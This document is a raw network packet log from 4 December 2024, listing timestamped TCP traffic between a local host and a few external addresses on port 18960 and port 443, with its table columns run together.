                                                                                                                                                                                                        Dec 4, 2024 13:53:11.088979959 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.089024067 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.090085030 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.090130091 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.090188026 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.091398954 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.091456890 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.091581106 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.092726946 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.092767954 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.092804909 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.093969107 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.094007969 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.094067097 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.095272064 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.095325947 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.095376968 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.096570015 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.096637011 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.096659899 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.097872972 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.097923994 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.098042965 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.099190950 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.099241018 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.099286079 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.100673914 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.100728035 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.100729942 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.101813078 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.101875067 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.101963043 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.103044033 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.103081942 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.112272978 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.120733976 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.187372923 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.187467098 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.187525988 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.187802076 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.187968016 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.188045025 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.189006090 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.189130068 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.189192057 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.190148115 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.190268040 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.190306902 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.191325903 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.191601992 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.191673040 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.192646980 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.192800999 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.192869902 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.193589926 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.193690062 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.193742990 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.194721937 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.194870949 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.194933891 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.195183039 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.195843935 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.195986986 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.196038008 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.196988106 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.197087049 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.197185040 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.198157072 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.198309898 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.198378086 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.199203968 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.199323893 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.199361086 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.200445890 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.200556993 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.200615883 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.201494932 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.201675892 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.201724052 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.202491045 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.202572107 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.202621937 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.203603029 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.203692913 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.203737020 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.204621077 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.204740047 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.204787970 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.205970049 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.206125021 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.206212044 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.207060099 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.207134008 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.207226038 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.207968950 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.207987070 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.208049059 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.208086014 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.208787918 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.208910942 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.208977938 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.209868908 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.210004091 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.210067034 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.210907936 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.210987091 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.211034060 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.211870909 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.211983919 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.212042093 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.212881088 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.212979078 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.213078022 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.214086056 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.214313030 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.214356899 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.215173006 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.215347052 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.215445995 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.216103077 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.216200113 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.216243029 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.216845989 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.216964960 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.217021942 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.217879057 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.217971087 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.218061924 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.218844891 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.218945980 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.218983889 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.219799042 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.219919920 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.219989061 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.220273018 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.220763922 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.220869064 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.220917940 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.221856117 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.221947908 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.221993923 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.222889900 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.222949028 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.223011971 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.226866007 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.245811939 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.329123020 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.329183102 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.333020926 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.333034039 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.333355904 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.343769073 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.387332916 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.804584980 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.804608107 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.804624081 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.804665089 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.804692984 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.804728031 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.804740906 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.984148026 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.984177113 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.984242916 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.984260082 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.984276056 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:11.984298944 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.027432919 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.027455091 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.027503014 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.027513027 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.027538061 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.027560949 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.155802965 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.155819893 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.159539938 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.159557104 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.163352966 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.193864107 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.193891048 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.193957090 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.193972111 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.193981886 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.194027901 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.217644930 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.217664957 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.217741013 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.217753887 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.217869043 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.333453894 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.333475113 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.333569050 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.333569050 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.333580971 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.333786964 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.349313974 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.349330902 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.349484921 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.349493027 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.349594116 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.366630077 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.366656065 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.366736889 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.366736889 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.366745949 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.366796017 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.382772923 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.382791042 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.382901907 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.382911921 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.383030891 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.396888971 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.396904945 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.396996021 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.396996021 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.397003889 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.397196054 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.414325953 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.414344072 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.414433002 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.414433002 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.414442062 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.414546967 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.428441048 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.428457975 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.428596973 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.428606987 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.428750038 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.435337067 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.435409069 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.435441017 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.435504913 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.435504913 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.435534954 CET49702443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.435545921 CET4434970213.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.472562075 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.472598076 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.472625971 CET49703443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.472635984 CET4434970313.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.472696066 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.472794056 CET49703443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.473042011 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.473054886 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.473480940 CET49703443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.473494053 CET4434970313.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.477564096 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.477588892 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482326984 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482346058 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482382059 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482712030 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482712030 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482734919 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482741117 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482770920 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482872009 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482873917 CET49706443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.482886076 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.483040094 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.483051062 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.900414944 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                        Dec 4, 2024 13:53:12.900419950 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                        Dec 4, 2024 13:53:13.072271109 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                        Dec 4, 2024 13:53:13.993750095 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.114200115 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.190529108 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.191520929 CET4434970313.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.191586018 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.191596985 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.193492889 CET49704443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.193497896 CET4434970413.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.202296019 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.202321053 CET49703443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.202337980 CET4434970313.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.202625990 CET4434970613.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.202769995 CET49703443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.202775002 CET4434970313.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.203403950 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.203418016 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.203691006 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.204041958 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.204060078 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.204080105 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.204087019 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:14.204560041 CET49705443192.168.2.713.107.246.63
